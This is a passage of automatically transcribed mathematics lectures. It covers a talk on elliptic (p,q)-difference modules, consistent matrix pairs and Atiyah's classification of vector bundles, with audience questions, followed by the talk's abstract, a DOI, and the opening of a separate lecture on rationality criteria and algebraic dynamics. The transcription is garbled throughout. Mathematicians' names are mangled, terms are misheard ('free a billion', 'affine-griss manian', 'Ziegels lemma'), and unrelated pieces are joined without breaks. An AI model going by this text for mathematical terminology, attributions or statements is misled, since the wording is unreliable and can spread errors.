rational. So you're done. But here, even after we meromorphically continue our F, we're faced with issues of periodicity, which are completely of a different nature. The second basic difference or issue is that F, in fact, did not be in K. And as you saw it, the conclusion is that it lies in this slightly larger ring R. And this is related, as we shall see, to the existence of non-previll vector bundles on the elliptic curve, which are invariant under pullback by these isogenes, sigma and tau. And these vector bundles were classified by ATI in 1957. And in the rational case, of course, every vector bundle over the multiplicative or additive pull is trivial. So are there questions so far? Okay, if I don't hear anybody, then I, Jason, if there's any problem with the connection, I rely on you. Okay, good. So I'd like to switch from the language of equations to the language of different small joules. Now, in the context of the three examples that we will be discussing, the two rational ones, and the elliptic one, this is only a matter of language. But maybe at the end of the talk, I will make a few remarks why, in other circumstances, other language of different modules is really better than the language of different equations. So a difference module is the following. You start with arbitrary field K and an arbitrary group gamma acting on K via field automorphisms. You let C be the field of constants, the invariance of the gamma. And the gamma difference module over K is a finite dimensional vector space M over K, which is equipped with a semi-linear action of gamma. In other words, for any little gamma in gamma, there should be a linear transformation over C, which is semi-linear over K, as you see in the first bullet. And of course, this should be an action. So the linear transformation associated to gamma composed with delta should be phi gamma composed with P delta. And the connection with equations goes by the following basic example. So in the three examples that we have been considering, we let K be this field, and gamma, the group generated by sigma and tau inside the automorphisms of K. And the meaning of P and Q being multiplicatively independent is simply that this group, abstractly, is free a billion of rank 2. And then we have this power series at hand F, and we look inside K hat field at the spin over K, over the global field of sigma to the i tau to the j F. So that's M is obviously a K vector space that's closed under the action of sigma and tau because they compute. And the meaning of having simultaneous molar difference or elliptic difference equations for sigma and tau is simply that the dimension of that this M is finite. Therefore, it is a gamma difference module. And under the assumptions of the three theorems, they will all follow from a similar theorem stating that this module M that we just described is the gen rate in sums. And the key point, which is full for thought, if you want to speculate or contemplate over higher dimensional analogs, maybe is that the rank of gamma is 2, while the dimension of the underlying a curve for the transcendence degree of the field K is 1. So in some sense, the system is overdetermined. Now in the two rational cases, the general simply means that this M descends to the complex numbers. In other words, there is a representation of gamma over C, which simply means of course, because gamma is E squared, a pair of commuting matrices, scalar commuting matrices constant, such that our M is obtained via a semiliner base change, okay, tenser over C with K and extend the action semilinerally. In our case, in the elliptic case, the the generacy will be more subtle and this more subtle structure theorem will be related to those vector bundles that I hinted at before. So as in linear algebra, it's useful to introduce coordinates and matrices. So we have gamma, which is isomorphic to C squared sitting inside the automorphisms of K in each of the three examples. We have M, which can be an abstract gamma difference module or the one that came in this example here, right, but you can now forget about the example. And you express the action of sigma in terms on a given basis in terms of a matrix, except that traditionally it's people denote the inverse of the matrix of the Aij's by A and the inverse of the matrix of the Bij's with B. And then the only condition really that you have to check is that phi sigma and phi tau commute and in linear algebra, this would mean that the matrices commute in semiliner algebra, it means that they satisfy this consistency condition. Sigma applied to B times A is tau applied to A times B. And if you change your basis, then in linear algebra, you would get conjugate matrices, here you get twisted conjugate matrices, which is called gauge equivalence. So you get A prime being sigma C inverse AC and B prime being tau C inverse BC, where C is the matrix of the change of basis. So as an immediate corollary, we deduce that the classification of gamma difference modules over K is basically the same as classifying consistent pairs AB of matrices in GLRK up to gauge equivalence. And this, if you prefer in the language of non-abillion-comology, is the same as the determination of, by definition, the determination of H1 gamma GLRK, but we shall not be using this language. And I want to just make a side remark that at this point, if you replace GLRK by another linear algebraic group G over K, then you would arrive at the notion of gamma difference modules with G structure. Now, I don't know enough to know if this has been explored. There is, in the Attic-Hodge theory, an example of such difference module, which is called an isocrystal, and this has been explored in the paper of Codwitz from 1985. But I mean, I'd be happy to know if this generalization had been explored. So let us start by discussing gamma difference modules over K-HET, over the simpler field of power series or Coozaw series. So either K-HET is Coozaw series with sigma and tau being molar operators, or in the other two cases, either the additive or the elliptic case, K-HET is the run series field with sigma and tau being just the usual difference operators. And in the elliptic case, of course, for global considerations, they have to come from integers, but now once we're dealing with a formal aspect, it doesn't really matter. So the formal structure theorem tells us that in all these cases, any gamma difference module over K-HET indeed descends to C, is over-determined in some sense, or equivalently in the language of matrices that we just introduced. Any consistent pair, A-B, is gauge equivalent over K-HET to commuting pair of scalar constant matrices. And this has been known for a lot of time, I think, and the proof can be found in various places in literature. It's based on the theory of new polygons and slopes. I do not want to go into it. There is a slight issue of uniqueness in the Muller case. This pair, A-0, B-0 of scalar matrices would be unique up to conjugation. In the two difference case, there is the issue of what I think is called sometimes resonance, but essentially up to resonance, it's also unique. And again, in the theory with which I was more familiar of F is a crystal, this is all theorem of Manin and Yudinne. So how would the proof of the conjecture of Lachstern and Wunderputten go following the ideas of Schiffke and Zinger, of course. So in this case, the Muller case, K is this field we discussed before, K-HET is the field of resource series in sigma and torr-Muller operators, and the theorem of Adam Szczepski and Bell follows quite easily from the fact that not only over K-HET, but even over K, any gamma difference module descends to C is obtained from a final dimensional representation of gamma by semi-linear base change. And I want to sketch the proof because our proof in the elliptic case will begin in the same way, but there will be differences as I pointed out at a certain point. So we look at the 3 points, 0, 1 and infinity. Why these three points? Because they are fixed points of the operator sigma and torr, and we introduce local parameters at these points, t0 is x, t infinity is 1 over x, and t1 is x minus 1. And we denote by ohet i for i being 0, 1, or infinity, the completion of the local ring of t1, and by K-HET i, the fraction field, the local field at that point, the complete local field at that point. And we start with some pair of matrices, consistent pair of matrices, describing our M in some basis. And by the formal structure theorem, we know that at each of these points separately, we can make a gauge transformation, but with a C i in glr of the completion at that point. So that resulting a i, b i are scalar, are constant. So for i equal 0, infinity, since we're dealing with not quite with right with rational functions, we might have first to replace the variable x by x to the one of rest, but this is a small point. Now, remember that we are allowed to replace a, b by any gauge equivalent pair over K, because this simply amounts to choosing a different basis over K. And weak approximation tells us that we can find the matrix, one matrix, with entries in K that simultaneously approximates C0, C infinity, or C1, in the topologies of the corresponding local field. And if we make such a gauge equivalence, such a change of basis, if you want, then we may assume that the C i are in glr, are not only in glr of K-HET i, but in glr of O-HET i. And in fact, we will not need it, but you may assume that they are as close to the identity matrix as you want. The next step is some estimates on the formal Taylor expansions and the local analyticity of A. I should say that under this assumption now, after the weak approximation, the A and the B will be analytic at the corresponding points, not just neuromorphic. And of course, you use this, can you see my cursor if I move over this? Yeah, okay. So you see, if you use this, for example, for A, this gives us a relation between sigma of C i, which is C i of x to the b, written as A i times C i inverse times A inverse, okay? But A i is constant, A is everywhere defined. So this gives us some functional equation, and we use it to show that the C i are not only formally analytic, but in fact, analytic in some disc. And in fact, we can boost up the region of convergence, or rather the region of meromorphicity, using the functional equation, because A is everywhere neuromorphic, A i is constant. So using this, repeatedly, we boost up the region of meromorphicity of C zero to the full southern hemisphere, C infinity to the full northern hemisphere, and C one to P one minus the two poles, the north and south pole. So now we have a large overlap, okay? At the beginning, these were formal power series, but now the overlap. So we can compare them on the overlap. For example, we can compare C zero and C one on the punctured southern hemisphere, and we get this type of functional equation. And it is an easy exercise to see that from this functional equation, you get that C zero one, in fact, has to be constant. But this means that C one, one, which is this constant matrix times C zero or C zero times this constant matrix, is actually meromorphically even analytic at zero two. And likewise, if you compare C one to C infinity, you get C one is meromorphic, not only outside the two poles, but also at the two poles. Therefore, it is a rational function. And therefore, it gives you, it allows you to reduce the structure to the complex numbers. So this is basically the whole proof. And it's a beautiful idea of Shavekin Zinger. So let us start by discussing elliptic PQ difference modules, or elliptic gamma difference modules. Sometimes they call them elliptic PQ difference modules, if the group gamma is generated by this P difference operator and gamma difference operator, of low ranks. So again, let me remind you, K is this field of elliptic functions on all the covering of our given elliptic curve. And forgive me for switching to sigma of f being f of z over b rather than of f b times z. And likewise, tau of f being f of z over g. This is just to be consistent with my paper. This simply amounts to considering sigma inverse and tau inverse in the original notation. And let's start with rank one. So if m one a b denotes the one dimensional module K times e, where sigma x on e as a inverse e and tau x on e like b inverse, e, c, a, and b are complex numbers. So you see immediately that this has the underlying c line, complex line, c, e as a complex structure. If we denote by m one a b this very simple rank one difference module that descends to c, then the proposition is that every rank one gamma difference module is in fact isomorphic to unique such m one a b. And this is already non-cruvial because already the issue of periodicity as we will explain shows up here. In rank two, this is already false. So I must admit when I started working on it, I hoped to get a generalization. Well, in any rank, but after not being able to do it, I found this following counter example. And this counter example in rank two is prototypical. It turns out that this is really, really prototypical for all that's going on later. So let zeta be this viashda's zeta function. So you can write it as the logarithmic derivative of the viashda's sigma function or up to a sine it is the primitive or app primitive of the partial spare function. And since the partial spare function is periodic, if you move the variable z by a lattice vector omega and subtract z of z, then you get a constant. This constant is traditionally called the Legendre etta function of omega. It's a homomorphism from the lattice to the complex numbers. Let gp of z be p times z of qz minus zeta of pqz. So you see immediately that this now is elliptic. This one, this function is lambda elliptic, right? Because if we change z to z plus omega, both pz, qz and zpqz change by the same number. And similarly, let gq be the function that is obtained by reversing the roles of p and q. And let a and b be these matrices, very nice matrices, one gp0p, one gq0q. So you can check they form a consistent pair and therefore they correspond to what I call the rank 2 standard special module. So explicitly it is k squared with sigma acting by multiplication by a inverse on the vector obtained by applying sigma to the coordinates and tau is acting by b inverse times the vector obtained by applying tau to the coordinates. And in this rank 2 case you can show, or this will be a special case of our main theorem, that every rank 1 elliptic pq difference module either admits a unixi structure or up to a twist by a rank 1 module is this standard special module or is a morphic to this standard special module. And this is an exclusive or right this these m2 standard a b are not, cannot descend to c, do not admit a c structure. So maybe I should ask if there are questions so far or Jason nobody has been sending you anything in the chat. Okay, I hope this is tell me if I'm too quick or too slow or okay good good. So let us start with the general classification theorem. So now that we have seen what happens in rank 1 and 2, let m be a rank r module over k of general rank represented by consistent pair a b and some basis. So as I promised you, we're going to follow the path of Schiffken's Inger. And the first step is much easier because instead of considering zero one and infinity, we have only to consider zero. And we find by the formal structure theorem, a c in g r over k hat, such that if you apply gauge transformation using this matrix C, you get a commuting pair of scalar matrices. So this is the initial step. The next step is again the same, but we do not have to use weak approximation because we are only dealing with one point. So it follows just by the density of k in k hat, that if we approximate the c very well by a matrix of global elliptic functions d, we replace a b by a gauge equivalent pair with this d and c correspondingly with d for c, then we may assume that c is in g r of o hat. And as before, it follows from this, that now after this gauge equivalence a and b will be analytic at zero. And the next step is again the same. Estimates and formal Taylor expansions give us exactly as before the fact that the c is analytic and some small disc. And still the next step, the fourth step is again as before, you use this functional equation, which basically tells you that c at p times e is a times c times a zero inverse, okay, to boost up the domain of meromorphicity, okay, it's well meromorphic continuation of analytic because a might have poles far away from zero. But of course, once you know, you first have it at radius, this get radius epsilon, then radius p epsilon p squared epsilon eventually, you cover the whole complex. But you're faced with a big, big difficulty, because now you're faced with the issue of periodicity. If you want to prove that c, this would not be the case, but if you wanted to prove that c is periodic for some lattice lambda commensurable with our lambda not, then you'd be facing a problem. So the key idea is that something of the periodicity is saved. And to explain this, I want to introduce some sheaves, but these are sheaves in the classical topology of c. So script m is the sheaf of meromorphic functions, script O is the sheaf of homomorphic functions, G is the sheaf glrm, sheaf of r by r invertible matrices with entries in meromorphic functions, h is the sub sheaf glrO, and f is the quotient, sheaf of cosets. So let's know, first of all, our c, what do we know about this matrix c so far? We tortured it enough to know that it is globally meromorphic. In other words, it's a global section of the sheaf G. Now, the sheaf f has a nice property that its sections are discreetly supported, because, right, because the poles of meromorphic functions are isolated. And what are the stocks of f at each point, so I'm going to explain, there are glr of La Ronde power series over glr of Taylor series. Okay, maybe you would argue that they have to insist on convergence, but because I'm taking this, these cosets, it's okay to write it like this. Now, this is a very well known object, this is called an affine-griss manian, and they play important role in many branches of mathematics, but I'm not sure if you can see it, but I think there are branches of mathematics, but I don't know much about them except that these are affine-griss manians, and I won't be using much about them. Now, we can identify the stock at xi and the stock at xi plus omega via translation, and we call a section of any of the sheafs, but in particular of the sheaf f of the sheaf of affine-griss manians lambda periodic, if under this identification, the germ of the global section at xi is the same as the germ at xi plus omega for every xi and any lattice vector omega, and we denote the lambda periodic sections by gamma sub lambda. And another terminology we will call as prime a section, ambitification at zero of s, if it only differs from s at the point zero. In other words, if when you restrict this global section to the huge open set, which is the complement of zero, it agrees with s. And here is the first theorem, which I call the periodistic theorem. We'll see it not be periodic, but the image of xi, remember xi was a global section of g. Okay, let me remind you g is glm, h is glro, and f is the sheaf of affine-griss manians glm over glro. So as a global section of g, xi need not be periodic, but as a global section of f, its image is lambda periodic for some small enough lambda, provided you allow a modification at zero, and this modification at zero is a nuisance, but you really have to do it sometimes. So as an example, what this means, let's take the case r equals one, f is simply the sheaf m star over o star, and via the degree map, it's simply z, right, but z somehow discreetly, at each point, discreetly and discontinuously, you put z. And cz is simply a global meromorphic function. What do you know about it? You know that c of pz over cz and c of qz over cz are elliptic functions. That's the input in this case. And the corollary would be not that c is periodic, but that its divisory is periodic. This is what it means to talk about the image of c, c bar, as a global section of f in this case. However, when r is one, you can invoke abel jacobi, and it's a little exercise to show that in this case, in fact, the modification at zero translates to multiplying by some power of c, z to the m, for some m times c, z would be periodic. But in rank two, this is already not the case. So let us see what we have done so far. Fix some lambda, and let's introduce the analytic notation. A lambda is the restricted product of these completions of the field k at xi, these fields of the Laurent power series around xi, restricted as usual with respect to the ring of holomorphic functions of Taylor expansions. And that blackboard bold O be the product of the O xi hat. So s, I did not by s, I didn't say so, but I did not by s, this modification of c bar that the periodist theorem gives me. So this s is a lambda periodic global section of f, and this is simply an element of glr of the adels of lambda. The adels is a ring, you can take glr of the adels of lambda over glr of this subring of the adels, oh lambda, the everywhere holomorphic adels. Now, to what extent this s is unique, remember that c is determined by m only up to left multiplication by a global matrix, a matrix of globally elliptic functions. So right this would be the gauge equivalence or the change of phases. So this gives us a well-defined class in this double-coset space of glr a lambda over glr o lambda on the right and over glr k lambda in the left. And this is a very familiar double-coset space. It's called the complex points of the stack, but these are big words. It's what it is, it's a double-coset space, and it classifies isomorphism classes of rank r vector bundles on the elliptic curve c over lambda. And remember this we can do for any lambda that is small enough as given to us by the period dsd theorem. So to sum up, m gives us c yields s and the class of s in this double-coset space depends only on m and it's a class of a certain vector bundle. And the functoriality tells us that for all lambda small enough, these e lambdas, these vector bundles are compatible under pullback and also they're invariant under multiplication or pullback rather via zogeny p or q if you want. Now in general vector bundles over varieties are very difficult to classify, but luckily Atiyah in a beautiful paper in 1957 classified all vector bundles on the elliptic curves. And one thing that he proved, he proved many other things, is that for any r there exists a unique up to isomorphism, a unique vector bundle, as denoted f r on c mod lambda on the elliptic curve c mod lambda, which is in the composable doesn't break up as a direct sum of vector bundles, has rank r has degree zero and it admits non-trivial global section. And in fact any other rank r degree zero in the composable vector bundle would be a twist of this one by a line bundle of degree zero. So this allows us to deduce quite easily that given this m we can attach to it and in the variant that we call the type, which is a partition of r into r one plus r two plus r k let's arrange them in increasing order it doesn't matter such that for all small enough lambda this vector bundle e lambda is isomorphic to f r one direct sum f r two and so on direct sum f r k it's of a very specific form. And moreover you can really write down using complex analysis a matrix in one r lambda representing this r f r and it's the matrix u r unipotent matrix which is the exponential of the vastre zeta function times n where n r is the nilpotent matrix with ones just above the main diagonal and zero elsewhere. So this is the matrix i plus zeta times n plus zeta squared over two factorials times n squared and so on right you you have all these diagonals above the main one and they're multiplied by zeta to the i over i factorial so it's a very explicit nice matrix of course this sum is finite because n is nilpotent and in fact it turns out that m admits a c structure if and only if its type is one one one in other words if and only if this vector bundle e lambda is trivial i haven't told you but of course f one the atia vector bundle frank one is the trivial vector bundle so e lambda is trivial even only if the type is one one one so from now on let us assume to simplify the presentation that the type of m is at the other extreme okay so there will be of course a lot of combinatorics that has to deal with the intermediate partitions but let's assume that the partition is simply r equals r in other words that e lambda is already in the composable so in this case the global section s remember it was we interpreted it as a global section of fun r lambda but now we know thanks to atia that it's also the global section sorry it's also represented by ur it's a double cost that's represented by ur now you can change it on the left by a matrix an infertible matrix with elliptic functions is input and then you can deduce that c well as is not quiet c because of this modification at zero so except possibly at zero c as ur times d and d now must be everywhere holomorphic because it should correspond in bond r lambda to something in this subring o rather in glr over that subring o so let us change the scalar matrices that we have arrived at in the beginning a zero and b zero by a gauge transformation using this d and we get matrices that they call t and s and then you can deduce that t and s are actually globally holomorphic and you you you finally get rid of this annoying uh mb u d at zero annoying there's a little emma here but uh you get t and s which are in glr of globally meromorphic functions and your a and b that represented the module uh of course there are matrices with entries in elliptic functions are given by urz over b t urz inverse or urz over q s urz inverse okay so remember this equation one is very important and now comes the second deep so you're in the key what i call the key lemma and this is that after a mild operation which is conjugation by scalar matrix commuting with ur okay this is allowed this equation one forces t and s to be a very special form in fact up to a constant a or b that corresponds of course to a twist by a rank one module and then there's simply the diagonal matrix one p p squared up to p to the r minus one or one q q squared up to q to the r minus one and now comes the main structure theorem in the case where the type is r if the type of m is r then up to a twist by a rank one module is isomorphic to what i call the rank r standard special gamma difference module so you have seen it before for r equals two this was exactly the example with which i started and the most the more general uh setup is this one so you have explicit t and s you you see them here you have a very explicit ur and you get some explicit a and b that involve these functions g p and g q and some tutorials and some nice formula they're upper triangular because everything here is upper triangular so well if the type is r m need not be need not descend to the complex numbers but still it is of a very special shape so here are some final remarks before i spend a few minutes i want to give you two slides at the end but what i call fun with elliptic functions to prove this kilomites really fun so the first remark is that as i said the kilomite and the periodicity theorem are the main technical steps as i also said when the type is arbitrary not one one one one and not r anything in between anything in between a more complicated structure theorem exists but it's still completely explicit and enough to give us the main theorem and finally that the theorem that asserts the theorem with which we started the talk asserting that f power series f satisfying simultaneously an elliptic p difference equation an elliptic q difference equation lies in this r follows from the main structure theorem applied to this m and of course now you can see where at least where the zeta function comes from the partial zeta function it comes from its appearance in this matrix u r so if there are no questions i will give some time for questions but if not i want to just show two more slides and prove the kilomite in a special case but let's see if there are questions about the formulation or about the logic of the proof yeah no okay i hope everything is clear okay good so here are these two slides that i promised either they call fun with elliptic functions and i will give you the proof of the key lemma when r equals two so forget about the theorem just the key lemma so the key lemma had the following input we had an equation which we called equation one let us go back and see it here okay that basically rearranging it says that a times u is u at z over p times t where a is one of the a and b that is a matrix of elliptic functions giving us of course the structure as a gamma difference module and t is this matrix that we deduced is everywhere holomorphic including at zero and u is this very special case of u r which is one zeta z one good so let's start exploring the consequences of this identity you start with the lower left corner this gives you c of z equals gamma of z but c is everywhere elliptic it is elliptic and gamma is everywhere holomorphic so c equals gamma equals a constant now you do bootstrapping why why do i call it bootstrapping because you use what you have proved about about c before that it is constant to improve and show that c is in fact zero c equals gamma equals zero and for this you take the lower right corner so bootstrapping step lower right corner tells you that c times z of z plus d of z equals zeta now take the sum of the residues in both sides over a fundamental domain for for for the elliptic curve you see delta is everywhere holomorphic it's it need not be periodic but but if everywhere holomorphic it contributes nothing d is elliptic so the sum of the residues is zero zeta has sum of residues which is non-zero so c must be zero so you deduce that c is zero and now you're left with the equation d equals delta so d is elliptic delta is everywhere holomorphic so they are constant as well now go to the upper left corner now we're allowed to rescale everything because we still have the freedom of twisting by m1ab by a rank one module so let's rescale so that this constant delta equals d is p and now looking at the upper left corner you get az equals alpha z and again for the same reason it is a constant both entire and elliptic and finally you look at the right upper corner and you get the equation az plus b is pz z over p plus beta so here is the only place where you have both zz and zz over p and you take again the residues and sum them over a fundamental parallel parallel be bad and you'll get that that for the residues to sum up properly the only possibility is that a is what was alpha also is one but then z of z minus p z of z over p is maybe up to the sign what I called before gp and this is an elliptic function and this should be beta minus b so beta again is both elliptic and homophic and it's constant finally to get rid of this beta all together you conjugate everything by a an upper triangular scalar matrix that's allowed and you end up with t equals 1 0 0 p and a having this very particular shape and you can guess that s is 0 1 0 1 0 0 q and b is 1 gqz 0 q so the general rank case uses exactly the same principles only the algebra and the bootstrapping it's not two-step bootstrapping it's r-step bootstrapping but basically it's it boils down to these same principles okay so I think I'm three minutes about time so thank you for your attention and please stay tuned for sure lots lecture on Friday thank you very much all right thank you for the talk and any questions let's see the change may I ask a question hi yeah hi I was wondering if it would be reasonable to include the data function in the base field so that you will have some some kind of analogous statement or yeah I think that's a very good point so as I said at the beginning I'm studying these things from from a gaula point of view or from point of view of this picard which we saw rings I think the answer is absolutely you're right absolutely this should be in some sense the better field maybe let's stick to rings because this is a slightly more precise result that this ring R you do not really need to take the field generated but by zeta and nz but I think you're right I think that this field somehow has better properties and that could be another formulation you're absolutely right thank you I'm very happy to see the faces of everybody finally because I was waiting for the last year papers with people that I don't know and or looking at papers people that I don't know so now I see their faces oh hi Joe I see Joe Szilvan I do know you for many years yes yes yes and Moshe Kaminsky I do know some people here yeah Zoe probably from her visits to Jerusalem so is there any other question I sort of general Pilbara theorem 90 that might sort of explain this non-Abelian poemology or interpretation or okay so who was asking that is me oh Jason hi okay so yeah so so the concept of the gamma difference module of course is very general maybe I'll use this opportunity to make the remark they wanted to make at the beginning and and if gamma is a finite group then what Hilbert's theorem 90 tells us is exactly the the theory of gamma difference modules is void that's that's one way to interpret Hilbert's theorem 90 is saying that that there are no non-trivial gamma different modules if finite group because right that's basically what Galois theory will tell you that gamma appears as a finite Galois extension and then you invoke up so in a way all this business in the language of of Galois Comology you can think of it as failure of Hilbert's theorem 90 in cases where gamma are come from some dynamical systems in a way okay not I imagine the interest in in these operators like yeah come somehow from questions in dynamics what I wanted to say is that there is yeah there is the language of equations and the language of modules and of course this is like in PDE's you know you you can either work in the language of partial differential equations linear of course only linear PDE's or the language of the modules and for this gamma that we talked about which is z squared a billion of frank two this is completely equivalent but you could think for example still in the rational case what would be a good theorem not of one of two molar operators or two q difference operators or two shift operators as in the paper by Schiffkin's finger but what would happen if you consider one molar operator and one q difference operator and it turns out that the Galois group generated by these two now is generalized the hydral and it's generally the hydral in a way that it is not enough to write two equations for the molar and the difference operators you really have to assume that this module is finite dimensional and if you want to express it in equations I think I might be wrong but I think that the number of the minimal number of equations that you would need would depend on p and q so there are cases I think were really this language of difference modules gives you a better way to formulate theorems than the language of equations yeah good
Adamczewski and Bell proved in 2017 a 30-year old conjecture of Loxton and van der Poorten, asserting that a Laurent power series, which simultaneously satisfies a p-Mahler equation and a q-Mahler equation for multiplicatively independent integers p and q, is a rational function. Similar looking theorems have been proved by Bezivin-Boutabaa and Ramis for pairs of difference, or difference-differential equations. Recently, Schafke and Singer gave a unified treatment of all these theorems. In this talk we shall discuss a similar theorem for (p,q)-difference equations over fields of elliptic functions. Despite having the same flavor, there are substantial differences, having to do with issues of periodicity, and with the existence of non-trivial (p,q)-invariant vector bundles on the elliptic curve.
10.14288/1.0397420 (DOI)
He's speaking about arithmetic, columnar and algebraic dynamics. Thank you very much. It is a great pleasure to be able to participate in this wonderful conference and workshop. I learned a lot from the previous talks. I hope my topic will fit into some of the things presented at the workshop. I begin with a motivation from the field of algebraic dynamics that first got me to think about arithmetic rationality criteria of the kind that I will discuss. Then there is a more recent development, which exposes a joint work with Frank Kalegari and Yunqing Tang for the second part. Around arithmetic holonomicity in the theory of g-functions and an application that I hope to outline. We consider the familiar setting from algebraic dynamics where I take an iteration, some endomorphism of alpha in space. That's a dynamic system about the simplest non-trivial kind. We do not have an extent to a projective space. Endomorphism is given by polynomials in the coordinate. This is a polynomial map. I consider a second coordinate. I'll call it lambda. That denotes a regular function, just morphism or polynomial. We ask for the growth behaviors of the height. This will be over a global field K. We take any orbit, the intention is it should be pretty arbitrary, and just record the values of the coordinate lambda or the function lambda along the orbit. We ask how can this grow and also the sequence of degrees if it is not eventually periodic. We start with a very obvious observation, just set theoretically. If you have an iteration from zd to zd, let's see how the dimension will come into play in the bounds we can expect and improve. Just by the pigeonhole principle, this is the north cut trivial bound, if the orbit is not eventually periodic, then just by arranging the points, arranging the orbit by increasing height, arranging points by bounded height, there are noting that there are not many points of height at most. This is where I will use the logarithmic height. Then we have a very obvious a priori bound. There is a dichotomy that either the orbit must be finite or the logarithmic height roughly grows at least n to the power 1 over d in the sense of taking the lim soup along the orbit. I like to start here because we will also mention some interesting work on this subject to which my criteria also relate. The arithmetic criteria will enter in the following way. Instead of doing this set theoretically, we can just, so let's now give them up an algebraic structure. I have a polynomial in the variables. For simplicity here, I assume it takes zd to zd to zd. We may reduce module of primes and do the same observation that the reduced orbit acts on a finite set of cardinality p to the d, the number of fp points, mod p points. It must be pre periodic and its pre period and period are both bounded by this. A very convenient way to use this is on the level of the generating function. Now if lambda is another polynomial this time function to z, then we record our orbit history on a formal power series which will be a generating function with integer coefficients in this case. It has various mod p rationality conditions that the reduction of mod p of this power series we have seen must be rational just by pigeonhole because we have finite iteration on a finite set and the degree of this rational function is at most p to the d. Here is a criterion of this kind that will immediately lead lower bound on the growth of the orbit. I think I, well essentially all of this goes back to a short paper from 1981 published in Acta Ritmetica. I actually have their evidence below on my slides. Also in the full generality I, in higher dimension as well, I outline, I have a short preprint on archive with this criterion. It just follows although Daniel considered the language of linear current sequences looking at the coefficients of the power series. But on the level of power series it reads we have f of x, a formal power series over a global field k. And for every place v at which we can reduce mod v, let's consider the degree of the reduction if that is, if the reduction is a rational function. And if the reduction does not exist or is not a rational function I'll just take the convention that dv is just infinity. And then we have the criterion that this formal power series is in fact a rational power series just as soon as these inequalities fulfilled. And now for this talk the quantity on the right will be ubiquitous. This is a standard notion of height for formal power series. I'll call it the height of the power series. I use this subscript k just to keep the general case in mind because but maybe you want, maybe it is good to restrict to k to the rational field q then I will omit the index just include the global function field case as well where we have no ground field. And then the condition is this inequality on the residual characterities of the finite fields, finite residue fields. It roughly says that if we have enough mod p rationality, rationality in a quantitative sense against the growth of the coefficients of the function ultimately all comes down to the product formula in the global field then the function is rational. In fact this is obviously a characterization the converse is trivial. So this is completely characterizes the rational functions in an arithmetic way. The proof is a typical use of Ziegels lemma and I'll just indicate quickly because we will, the theme will occur in the more in the more recent criteria. We have, we can use m equations in m variables for these choices and there was this parameter kappa in this in the criterion that will come from exactly Ziegels lemma as the Dirichlet exponent. And then we construct this is typical transcendence extrapolation proof with auxiliary construction. We start with an auxiliary construction which is the approximate relation. We solve a linear system of equations for a polynomial q with integer coefficients and small height. We have degrees of p and q bounded by this and height bounded by that. And then extrapolate the coefficients using the multi-information. This is like the trivial Bezou bound in the projective space over the residue fields for OV. Just the bound on the intersection multiplicity at zero by the total degree. And then we use the product formula and the details are quite easy. Again here is the reference to the original paper actually it's 1982. And I also mentioned that this is in fact can the optimal version is not what I wrote. The following the generalization of the conjecture of Roussa on pseudo polynomials. The shark version should delete somehow the parameter kappa that I will not discuss but that came artificially in Ziegels lemma. In the in the applications of the arithmetic columnistic theorem this will be the key point however in the analogous setting that I will turn to. And this is used I think I sketched how this should imply a lower bound on the orbit goals for iterations of our fine space. Because the iteration has a model as well as the lambda over the a-syntegers for a finite set of places as the full height history is just controlled by by just the fine veil height of the individual coordinates. The whole orbit is S integral we have the prime number theorem that tells us exactly how much mod piationality we have. You see the dimension occurring here because of as one over the index exponent. Because I know the reduction mod V is a rational function bounded of degree bounded by that. So this is ultimately how how it enters. And finally we get the following the rationality criterion does much better essentially improves the previous the trivial counting bound by north code than exponential. It turns out it follows that either our orbit recorded by the coordinate lambda I mean by the observable by the function lambda is either so this either piecewise and a polynomial is wise in that the large enough n partitioning to finitely many arithmetic progressions and on each of them these coordinates is a polynomial in n or else we have this where now notice that my the height function was logarithmic and I've taken the log of the logarithmic height on and also I have included the individual lambda here that is still not trivial from the north code bounded for the full orbit growth. So this is the exponential improvement in particular and all right I think I repeated the last display and also I'll just mention that one can use a specialization argument to the global field to also get an implication from this arithmetic statement this arithmetic method to a purely algebraic statement about the growth of degrees but in restricted situation again we move and then lambda is just a polynomial map then we know that the sequence of these degrees again I think what makes it non-trivial is that I have first taken lambda and then composed with the nth iterate is either eventually periodic or unbounded and if it's unbounded there is some explicit but horrible lower bound on the growth. So before I turn to the holonomicity versions of such criteria I will I want to point out some related work by different methods that there is the theorem of Ulle that contains exactly this kind of bound on the degree but for the full for the full degree there is no lambda involved and it is I think more general that it applies not only to morphisms of affine space but any at the morphism of an affine variety and also even for the lemins of the height there is this work of Kantat and Xie giving divergence of lemins if the sequence of degrees is not eventually periodic and in the setting of rational meromorphic algebraic dynamics where we have any dominant rational self-map of a quasi-projective variety then again we have the same observation starting from Northcott on the limb soup of this kind of growth but this is for the full height and it does not include the lambda the orbit is not sampled on the fixed function you cannot look at just one coordinate and I would like to point out that it seems this same bound if you put lambda of fn of p should be also fulfilled in the following with exactly this gap of one over the dimension of x just as soon as the orbit is not piecewise polynomial in n and sorry and that is I apologize that this is how it should read this not quite right I should have the orbit to be not piecewise polynomial or arithmetic progressions and however there is recent work that I'll indicate on the next slide that does show the positivity of this incomplete generality and these are the references the I think please correct me if I get it wrong but I think there is no so there is some explicit bound but it's worse than one over the dimension of the variety I think this should be expected and there was the paper by Belkioka and Satyano in the case where f is an endomorphism by a periodic analytic method as opposed to this one which is spot p but where p varies I think in full generality and even more recent paper oh I apologize I do not okay I think on the slides I sent you there I have updated the publication the full reference for this paper which is in the case of a rational self map now I turn to two more general criteria and I will introduce the height a bit of notation that I already mentioned this is for any go over any global field and there is also another standard notion that I will call the tau tau of f is a what remains of the height after you take account of all the convergence radii so that means that the full height will decompose into an analytic piece so to speak which will involve which will be just the log plus of one over the convergence radius of the power series and so this would be the case if the coefficients were as in to go for a set of places but in general think of the think of the logarithm series for example the convergence radii are all one and the height is one by the prime number theorem so in general there remains another part that is the true denominators part true arithmetic part if you if you that makes sense of the height so technically it's defined by this formula that you first take a finite set of places then you consider the same growth rate of the height but after it's depleted you remove the contributions from the finite set of places and finally you see how small can you make that if by increasing the finite set of places so the the moral of this is that tau is zero if the coefficients are a syntagere for a finite set of places and the condition tau equal to zero should be read as a slightly weaker quantitative version of a syntagere coefficient. Assyntagere coefficients appear in the most celebrated classical rationality criterion the one of Emil Borrell that work revised in his work on the congruent zeta function he used it to give the to prove the rationality of the zeta function of any variety over a finite field and we will include this so the first result on this will be refinement of the theorem of Borrell and work that also will be the sharp strength strengthening of theorem from Andres book g functions and geometry the broad work criterion will be the case but tau is equal to zero essentially a syntagere coefficients and the improvement will be essentially by completely deleting the parameter kappa that was artificial and we saw earlier but in this in this context I will I will not include mod p conditions at all I'll just just limit the discussion to the attic the attic analytic conditions so as in the broad work criterion the 